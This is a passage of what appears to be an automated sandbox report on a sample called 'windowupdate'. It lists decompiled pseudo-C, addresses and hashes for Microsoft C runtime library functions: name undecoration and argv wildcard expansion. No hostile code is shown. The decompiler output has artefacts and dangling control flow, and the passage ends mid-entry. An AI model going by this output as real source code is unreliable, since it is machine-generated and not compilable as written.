                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h
                      • API String ID: 3912913270-4241246472
                      • Opcode ID: 669e9bcda59ea25a71877a9c302724e9bfc2d851f438898e1415790fd1ac6ede
                      • Instruction ID: 4bf226f9a89526e93cf2ce76512c7483e3aee31804eee0ef6c05b687594400aa
                      • Opcode Fuzzy Hash: 669e9bcda59ea25a71877a9c302724e9bfc2d851f438898e1415790fd1ac6ede
                      • Instruction Fuzzy Hash: 45022675A00208EFCB14DF94E891BEEB7B5EF49310F148159F50AAB291DB706E85CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5A860 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D5A860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char* _t28;
				char* _t29;
				char* _t30;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				char _t43;
				char* _t44;
				intOrPtr _t45;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;

				_t86 = __esi;
				_t85 = __edi;
				_t51 = __ebx;
				E00D4F3F0( &_v12);
				if( *0xf20644 != 0) {
					_t28 =  *0xf20644; // 0x0
					if( *_t28 != 0x3f) {
						L4:
						_t29 =  *0xf20644; // 0x0
						__eflags =  *_t29 - 0x3f;
						if( *_t29 != 0x3f) {
							L11:
							_t30 =  *0xf20644; // 0x0
							__eflags =  *_t30 - 0x3f;
							if(__eflags != 0) {
								L15:
								E00D4F820( &_v12, E00D544C0(_t51, _t85, _t86, __eflags,  &_v60));
							} else {
								_t33 =  *0xf20644; // 0x0
								__eflags =  *((char*)(_t33 + (1 << 0))) - 0x3f;
								if(__eflags != 0) {
									goto L15;
								} else {
									_t34 =  *0xf20644; // 0x0
									__eflags =  *((char*)(_t34 + (1 << 1))) - 0x40;
									if(__eflags != 0) {
										goto L15;
									} else {
										E00D4F920( &_v12, 2);
									}
								}
							}
						} else {
							_t36 =  *0xf20644; // 0x0
							__eflags =  *((char*)(_t36 + (1 << 0))) - 0x24;
							if( *((char*)(_t36 + (1 << 0))) != 0x24) {
								goto L11;
							} else {
								E00D4F820( &_v12, E00D58500(_t51, _t85, _t86,  &_v44, 0));
								__eflags = E00D5AB70( &_v12) - 2;
								if(__eflags == 0) {
									L9:
									_t79 =  *0xf20644; // 0x0
									 *0xf20640 = _t79;
									E00D4F820( &_v12, E00D544C0(_t51, _t85, _t86, __eflags,  &_v52));
								} else {
									_t43 = E00D52290();
									__eflags = _t43;
									if(_t43 == 0) {
										_t44 =  *0xf20640; // 0x0
										__eflags =  *_t44;
										if(__eflags != 0) {
											goto L9;
										}
									}
								}
							}
						}
					} else {
						_t45 =  *0xf20644; // 0x0
						_t96 =  *((char*)(_t45 + (1 << 0))) - 0x40;
						if( *((char*)(_t45 + (1 << 0))) != 0x40) {
							goto L4;
						} else {
							_t82 =  *0xf20640; // 0x0
							_t83 = _t82 + 2;
							 *0xf20640 = _t83;
							_v20 = E00D50060("CV: ", 4);
							_v16 = _t83;
							E00D4F820( &_v12, E00D4FAA0( &_v36,  &_v20, E00D544C0(__ebx, __edi, __esi, _t96,  &_v28)));
						}
					}
				}
				E00D4F240(_a4,  &_v12);
				return _a4;
			}























                      0x00d5a860
                      0x00d5a860
                      0x00d5a860
                      0x00d5a869
                      0x00d5a875
                      0x00d5a87b
                      0x00d5a886
                      0x00d5a8ed
                      0x00d5a8ed
                      0x00d5a8f5
                      0x00d5a8f8
                      0x00d5a96c
                      0x00d5a974
                      0x00d5a97d
                      0x00d5a980
                      0x00d5a9b9
                      0x00d5a9c9
                      0x00d5a982
                      0x00d5a98a
                      0x00d5a993
                      0x00d5a996
                      0x00000000
                      0x00d5a998
                      0x00d5a99f
                      0x00d5a9a8
                      0x00d5a9ab
                      0x00000000
                      0x00d5a9ad
                      0x00d5a9b2
                      0x00d5a9b2
                      0x00d5a9ab
                      0x00d5a996
                      0x00d5a8fa
                      0x00d5a902
                      0x00d5a90b
                      0x00d5a90e
                      0x00000000
                      0x00d5a910
                      0x00d5a922
                      0x00d5a92f
                      0x00d5a932
                      0x00d5a949
                      0x00d5a949
                      0x00d5a94f
                      0x00d5a965
                      0x00d5a934
                      0x00d5a934
                      0x00d5a939
                      0x00d5a93b
                      0x00d5a93d
                      0x00d5a945
                      0x00d5a947
                      0x00000000
                      0x00000000
                      0x00d5a947
                      0x00d5a93b
                      0x00d5a96a
                      0x00d5a90e
                      0x00d5a888
                      0x00d5a890
                      0x00d5a899
                      0x00d5a89c
                      0x00000000
                      0x00d5a89e
                      0x00d5a89e
                      0x00d5a8a4
                      0x00d5a8a7
                      0x00d5a8bc
                      0x00d5a8bf
                      0x00d5a8e3
                      0x00d5a8e3
                      0x00d5a89c
                      0x00d5a886
                      0x00d5a9d5
                      0x00d5a9e0

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5A869
                      • operator+.LIBVCRUNTIMED ref: 00D5A8D7
                        • Part of subcall function 00D4FAA0: DName::operator+.LIBCMTD ref: 00D4FAC0
                      • Mailbox.LIBCMTD ref: 00D5A8E3
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5A8C6
                        • Part of subcall function 00D544C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D544EB
                        • Part of subcall function 00D544C0: Mailbox.LIBCMTD ref: 00D54536
                      • Mailbox.LIBCMTD ref: 00D5A922
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5A959
                      • Mailbox.LIBCMTD ref: 00D5A965
                      • DName::operator=.LIBVCRUNTIMED ref: 00D5A9B2
                      • Mailbox.LIBCMTD ref: 00D5A9D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
                      • String ID: CV:
                      • API String ID: 1608807181-3725821052
                      • Opcode ID: 7abaa992b6723441fa40bd055381cd0dc7cb4714e686731e21834f9652a92e23
                      • Instruction ID: 6c15883454ddf5c672334536c5f3b84cb25c33d4614c671bf5f8cb1d65d85283
                      • Opcode Fuzzy Hash: 7abaa992b6723441fa40bd055381cd0dc7cb4714e686731e21834f9652a92e23
                      • Instruction Fuzzy Hash: CE41E8B29000289BDB24DB54D8A2BBE3FB4EB51302F444169FC175B952DF305949DFB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D57B30 Relevance: 19.6, APIs: 13, Instructions: 111COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D57B30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				void* _t37;
				intOrPtr _t40;
				intOrPtr _t52;
				char* _t54;
				intOrPtr _t56;
				char* _t66;
				char* _t67;
				char* _t78;
				char _t85;
				char _t87;
				void* _t92;
				void* _t93;

				E00D4F3F0( &_v28);
				_t37 = E00D5A1E0(__ebx, __edi, __esi,  &_v52, 1, 0);
				_t93 = _t92 + 0xc;
				E00D4F820( &_v28, _t37);
				if(E00D5AB70( &_v28) == 0) {
					_t78 =  *0xf20640; // 0x0
					_t87 =  *_t78;
					if(_t87 != 0) {
						_t54 =  *0xf20640; // 0x0
						_t99 =  *_t54 - 0x40;
						if( *_t54 != 0x40) {
							_v36 = E00D50060("::", 2);
							_v32 = _t87;
							_t56 = E00D575A0(__ebx, __edi, __esi, _t99,  &_v60);
							_t93 = _t93 + 0xc;
							_v8 = _t56;
							_v12 = E00D4FB30(_v8,  &_v68,  &_v36);
							E00D4F820( &_v28, E00D4FB70(_v12,  &_v76,  &_v28));
						}
					}
				}
				_t66 =  *0xf20640; // 0x0
				if( *_t66 != 0x40) {
					_t67 =  *0xf20640; // 0x0
					_t85 =  *_t67;
					__eflags = _t85;
					if(_t85 == 0) {
						_t40 = E00D5A560( &_v28);
						__eflags = _t40;
						if(_t40 == 0) {
							_v44 = E00D50060("::", 2);
							_v40 = _t85;
							_v16 = E00D4F350( &_v84, 1);
							_v20 = E00D4FB30(_v16,  &_v92,  &_v44);
							E00D4F820( &_v28, E00D4FB70(_v20,  &_v100,  &_v28));
						} else {
							E00D4F920( &_v28, 1);
						}
					} else {
						E00D4F920( &_v28, 2);
					}
				} else {
					_t52 =  *0xf20640; // 0x0
					 *0xf20640 = _t52 + 1;
				}
				E00D4F240(_a4,  &_v28);
				return _a4;
			}































                      0x00d57b39
                      0x00d57b46
                      0x00d57b4b
                      0x00d57b52
                      0x00d57b61
                      0x00d57b63
                      0x00d57b69
                      0x00d57b6e
                      0x00d57b70
                      0x00d57b78
                      0x00d57b7b
                      0x00d57b8c
                      0x00d57b8f
                      0x00d57b96
                      0x00d57b9b
                      0x00d57b9e
                      0x00d57bb1
                      0x00d57bc8
                      0x00d57bc8
                      0x00d57b7b
                      0x00d57b6e
                      0x00d57bcd
                      0x00d57bd9
                      0x00d57bea
                      0x00d57bf0
                      0x00d57bf3
                      0x00d57bf5
                      0x00d57c06
                      0x00d57c0b
                      0x00d57c0d
                      0x00d57c2a
                      0x00d57c2d
                      0x00d57c3a
                      0x00d57c4d
                      0x00d57c64
                      0x00d57c0f
                      0x00d57c14
                      0x00d57c14
                      0x00d57bf7
                      0x00d57bfc
                      0x00d57bfc
                      0x00d57bdb
                      0x00d57bdb
                      0x00d57be3
                      0x00d57be3
                      0x00d57c70
                      0x00d57c7b

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D57B39
                      • Mailbox.LIBCMTD ref: 00D57B52
                      • Mailbox.LIBCMTD ref: 00D57BC8
                      • DName::DName.LIBVCRUNTIMED ref: 00D57C35
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+.LIBCMTD ref: 00D57C48
                      • DName::operator+.LIBCMTD ref: 00D57BBF
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB80
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB98
                      • DName::operator+.LIBCMTD ref: 00D57BAC
                        • Part of subcall function 00D4FB30: Mailbox.LIBCMTD ref: 00D4FB40
                        • Part of subcall function 00D4FB30: Mailbox.LIBCMTD ref: 00D4FB58
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57BFC
                      • DName::isEmpty.LIBCMTD ref: 00D57C06
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57C14
                        • Part of subcall function 00D575A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D575AC
                        • Part of subcall function 00D575A0: Mailbox.LIBCMTD ref: 00D57604
                      • DName::operator+.LIBCMTD ref: 00D57C5B
                      • Mailbox.LIBCMTD ref: 00D57C64
                      • Mailbox.LIBCMTD ref: 00D57C70
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
                      • String ID:
                      • API String ID: 2733737839-0
                      • Opcode ID: 7326a1d907ca757363ebd5488921ce5e20c8377750918a0bcc1aecb1e79d2e44
                      • Instruction ID: 3cbfeac6e9a6bed80c386ced3ba2e0e09c02de972b1b1d73d1f1a8358c23236f
                      • Opcode Fuzzy Hash: 7326a1d907ca757363ebd5488921ce5e20c8377750918a0bcc1aecb1e79d2e44
                      • Instruction Fuzzy Hash: A1416271D041199BDF14EFA4DCA2EFE7B79FF44301F144129E9066A191EB706A49CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D54EA0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 114COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D54EA0(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v24;
				signed int _v28;
				char _v32;
				char* _v36;
				char _v40;
				char* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v72;
				char* _t48;
				char* _t79;
				signed int _t80;

				E00D4F3F0( &_v24);
				_t48 =  *0xf20640; // 0x0
				if( *_t48 == 0) {
					E00D4F350(_a4, 1);
					return _a4;
				}
				_t79 =  *0xf20640; // 0x0
				_v8 =  *_t79;
				_v8 = _v8 - 0x30;
				if(_v8 > 7) {
					E00D4F350(_a4, 2);
					return _a4;
				}
				_t80 = _v8;
				switch( *((intOrPtr*)(_t80 * 4 +  &M00D55018))) {
					case 0:
						_v32 = E00D50060("char ", 5);
						_v28 = _t80;
						E00D4F7E0( &_v24,  &_v32);
						goto L9;
					case 1:
						_v40 = E00D50060("short ", 6);
						_v36 = __edx;
						__ecx =  &_v40;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v40);
						goto L9;
					case 2:
						goto L9;
					case 3:
						_v48 = E00D50060("int ", 4);
						_v44 = __edx;
						__edx =  &_v48;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v48);
						goto L9;
					case 4:
						_v56 = E00D50060("long ", 5);
						_v52 = __edx;
						__eax =  &_v56;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v56);
						L9:
						_t73 =  *0xf20640; // 0x0
						_v16 =  *_t73;
						_t57 =  *0xf20640; // 0x0
						 *0xf20640 = _t57 + 1;
						_v12 = _v16;
						_t83 = _v12 - 0x31;
						_v12 = _t83;
						if(_v12 > 6) {
							goto L12;
						}
						switch( *((intOrPtr*)(_v12 * 4 +  &M00D55038))) {
							case 0:
								goto L11;
							case 1:
								goto L12;
						}
					case 5:
						L11:
						_v64 = E00D50060("unsigned ", 9);
						_v60 = _t83;
						E00D4F820( &_v24, E00D4FAA0( &_v72,  &_v64,  &_v24));
						goto L12;
					case 6:
						L12:
						E00D4F240(_a4,  &_v24);
						return _a4;
				}
			}





















                      0x00d54ea9
                      0x00d54eae
                      0x00d54eb8
                      0x00d55009
                      0x00000000
                      0x00d5500e
                      0x00d54ebe
                      0x00d54ec7
                      0x00d54ed0
                      0x00d54ed7
                      0x00d54f7a
                      0x00000000
                      0x00d54f7f
                      0x00d54edd
                      0x00d54ee0
                      0x00000000
                      0x00d54ef6
                      0x00d54ef9
                      0x00d54f03
                      0x00000000
                      0x00000000
                      0x00d54f19
                      0x00d54f1c
                      0x00d54f1f
                      0x00d54f23
                      0x00d54f26
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d54f3e
                      0x00d54f41
                      0x00d54f44
                      0x00d54f48
                      0x00d54f4b
                      0x00000000
                      0x00000000
                      0x00d54f61
                      0x00d54f64
                      0x00d54f67
                      0x00d54f6b
                      0x00d54f6e
                      0x00d54f87
                      0x00d54f87
                      0x00d54f90
                      0x00d54f93
                      0x00d54f9b
                      0x00d54fa3
                      0x00d54fa9
                      0x00d54fac
                      0x00d54fb3
                      0x00000000
                      0x00000000
                      0x00d54fb8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d54fbf
                      0x00d54fce
                      0x00d54fd1
                      0x00d54fec
                      0x00000000
                      0x00000000
                      0x00d54ff1
                      0x00d54ff8
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
                      • String ID: char $int $long $short $unsigned
                      • API String ID: 3503010255-3894466517
                      • Opcode ID: 60438ecb2735a1d6e12a457c4cb42bacd681ae9c246101d5bc825d6460cec555
                      • Instruction ID: 6b0a7ec050e3e6c158be85cb3a547dabaf072c58f23760da04597fd12904fcef
                      • Opcode Fuzzy Hash: 60438ecb2735a1d6e12a457c4cb42bacd681ae9c246101d5bc825d6460cec555
                      • Instruction Fuzzy Hash: 6F4121B1D40208EFCB15DF98DC92AEEBBB4FF44305F14416AE90677291EA305A48CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9D2C0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 221timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00D9D2C0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4, void* _a8) {
				char _v6;
				char _v7;
				char _v8;
				signed int* _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr _v92;
				char _v104;
				void* _t107;
				void* _t109;
				signed char _t111;
				void* _t116;
				void* _t134;
				signed int _t136;
				signed int _t139;
				signed int _t143;
				void* _t149;
				void* _t150;
				void* _t151;
				signed int _t180;
				signed int _t195;
				signed int _t198;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t205;
				void* _t208;

				_t203 = __esi;
				_t202 = __edi;
				_t151 = __ecx;
				_t150 = __ebx;
				if(_a8 == 0) {
					_v40 = 0;
				} else {
					_v40 = 1;
				}
				_v44 = _v40;
				_t211 = _v44;
				if(_v44 == 0) {
					_t149 = L00D84930(_t211, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0, L"%ls", L"result != nullptr");
					_t204 = _t204 + 0x18;
					if(_t149 == 1) {
						asm("int3");
					}
				}
				if(_v44 != 0) {
					 *_a8 = 0;
					E00D9E400( &_v104);
					_v12 = _a4;
					while(1) {
						__eflags =  *_v12;
						if( *_v12 == 0) {
							break;
						}
						_v8 = 0x2a;
						_v7 = 0x3f;
						_v6 = 0;
						_t136 = E00D9E300(_v12,  &_v8);
						_t208 = _t204 + 8;
						_v52 = _t136;
						__eflags = _v52;
						if(_v52 != 0) {
							_t139 = E00D9DAE0(_t150, _t202, _t203,  *_v12, _v52,  &_v104);
							_t204 = _t208 + 0xc;
							_v56 = _t139;
							__eflags = _v56;
							if(_v56 == 0) {
								L17:
								_t180 =  &(_v12[1]);
								__eflags = _t180;
								_v12 = _t180;
								continue;
							}
							_v76 = _v56;
							E00D9E500( &_v104);
							return _v76;
						}
						_t143 = E00D9D8A0( *_v12, _t202,  *_v12, 0, 0,  &_v104);
						_t204 = _t208 + 0x10;
						_v48 = _t143;
						__eflags = _v48;
						if(_v48 == 0) {
							goto L17;
						}
						_v72 = _v48;
						E00D9E500( &_v104);
						return _v72;
					}
					_v60 = E00D9EFB0( &_v104) + 1;
					_v32 = 0;
					_v28 = E00D9E980( &_v104);
					while(1) {
						_t107 = E00D9EAF0( &_v104);
						__eflags = _v28 - _t107;
						if(_v28 == _t107) {
							break;
						}
						_t134 = E00D8BFB6(_v28);
						_t204 = _t204 + 4;
						_t51 = _t134 + 1; // 0x1
						_v32 = _v32 + _t51;
						_t198 = _v28 + 4;
						__eflags = _t198;
						_v28 = _t198;
					}
					_t109 = E00D8B890(_t202, _v60, _v32, 1);
					_t205 = _t204 + 0xc;
					E00D8B460( &_v16, _t109);
					_t111 = E00D8B520( &_v16);
					__eflags = _t111 & 0x000000ff;
					if((_t111 & 0x000000ff) != 0) {
						_v84 = E00D8B6D0( &_v16);
						_v64 = E00D8B6D0( &_v16) + _v60 * 4;
						_v36 = _v84;
						_v24 = _v64;
						_v20 = E00D9E980( &_v104);
						while(1) {
							_t116 = E00D9EAF0( &_v104);
							__eflags = _v20 - _t116;
							if(_v20 == _t116) {
								break;
							}
							_v68 = E00D8BFB6(_v20) + 1;
							_v88 = _v32 - _v24 - _v64;
							E00D84A20(E00D9E1E0( &_v24,  &_v88, _v20,  &_v68), _t126, L"traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x175, 0);
							_t205 = _t205 + 0x2c;
							 *_v36 = _v24;
							_v36 = _v36 + 4;
							_v24 = _v24 + _v68;
							_t195 = _v20 + 4;
							__eflags = _t195;
							_v20 = _t195;
						}
						 *_a8 = E00D8B5E0( &_v16);
						_v92 = 0;
						E00D8B4C0( &_v16);
						E00D9E500( &_v104);
						return _v92;
					}
					_v80 = 0xffffffff;
					E00D8B4C0( &_v16);
					E00D9E500( &_v104);
					return _v80;
				} else {
					 *((intOrPtr*)(L00D82F70(_t151))) = 0x16;
					E00D82900(L"result != nullptr", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0);
					return 0x16;
				}
			}















































                      0x00d9d2c0
                      0x00d9d2c0
                      0x00d9d2c0
                      0x00d9d2c0
                      0x00d9d2cc
                      0x00d9d2d7
                      0x00d9d2ce
                      0x00d9d2ce
                      0x00d9d2ce
                      0x00d9d2e1
                      0x00d9d2e4
                      0x00d9d2e8
                      0x00d9d302
                      0x00d9d307
                      0x00d9d30d
                      0x00d9d30f
                      0x00d9d30f
                      0x00d9d30d
                      0x00d9d314
                      0x00d9d34c
                      0x00d9d355
                      0x00d9d35d
                      0x00d9d36b
                      0x00d9d36e
                      0x00d9d371
                      0x00000000
                      0x00000000
                      0x00d9d377
                      0x00d9d37b
                      0x00d9d37f
                      0x00d9d38b
                      0x00d9d390
                      0x00d9d393
                      0x00d9d396
                      0x00d9d39a
                      0x00d9d3e1
                      0x00d9d3e6
                      0x00d9d3e9
                      0x00d9d3ec
                      0x00d9d3f0
                      0x00d9d408
                      0x00d9d365
                      0x00d9d365
                      0x00d9d368
                      0x00000000
                      0x00d9d368
                      0x00d9d3f5
                      0x00d9d3fb
                      0x00000000
                      0x00d9d400
                      0x00d9d3aa
                      0x00d9d3af
                      0x00d9d3b2
                      0x00d9d3b5
                      0x00d9d3b9
                      0x00000000
                      0x00d9d3d1
                      0x00d9d3be
                      0x00d9d3c4
                      0x00000000
                      0x00d9d3c9
                      0x00d9d418
                      0x00d9d41b
                      0x00d9d42a
                      0x00d9d438
                      0x00d9d43b
                      0x00d9d440
                      0x00d9d443
                      0x00000000
                      0x00000000
                      0x00d9d449
                      0x00d9d44e
                      0x00d9d454
                      0x00d9d458
                      0x00d9d432
                      0x00d9d432
                      0x00d9d435
                      0x00d9d435
                      0x00d9d467
                      0x00d9d46c
                      0x00d9d473
                      0x00d9d47b
                      0x00d9d483
                      0x00d9d485
                      0x00d9d4ae
                      0x00d9d4bf
                      0x00d9d4c5
                      0x00d9d4cb
                      0x00d9d4d6
                      0x00d9d4e4
                      0x00d9d4e7
                      0x00d9d4ec
                      0x00d9d4ef
                      0x00000000
                      0x00000000
                      0x00d9d500
                      0x00d9d50e
                      0x00d9d540
                      0x00d9d545
                      0x00d9d54e
                      0x00d9d556
                      0x00d9d55f
                      0x00d9d4de
                      0x00d9d4de
                      0x00d9d4e1
                      0x00d9d4e1
                      0x00d9d572
                      0x00d9d574
                      0x00d9d57e
                      0x00d9d586
                      0x00000000
                      0x00d9d58b
                      0x00d9d487
                      0x00d9d491
                      0x00d9d499
                      0x00000000
                      0x00d9d316
                      0x00d9d31b
                      0x00d9d337
                      0x00000000
                      0x00d9d33f

                      APIs
                      • std::exception::exception.LIBCMTD ref: 00D9D355
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9D473
                        • Part of subcall function 00D9E1E0: __wcstombs_l.LIBCMTD ref: 00D9E1FD
                      • __invoke_watson_if_error.LIBCMTD ref: 00D9D540
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
                      • String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
                      • API String ID: 3210742261-976376051
                      • Opcode ID: a9512855db5435fc986e5344f0fbee84f705c3bff43540656bd9a3cb2322f63e
                      • Instruction ID: 4808999d8376234ccedbd00b1515ba3213d99c8b85b597a53a94359dfb7c1b43
                      • Opcode Fuzzy Hash: a9512855db5435fc986e5344f0fbee84f705c3bff43540656bd9a3cb2322f63e
                      • Instruction Fuzzy Hash: 94912870D00209EFDF04EF94C886AEEB7B5EF54304F24452AE5067B291EB70AA45CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D31CF0 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 151COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
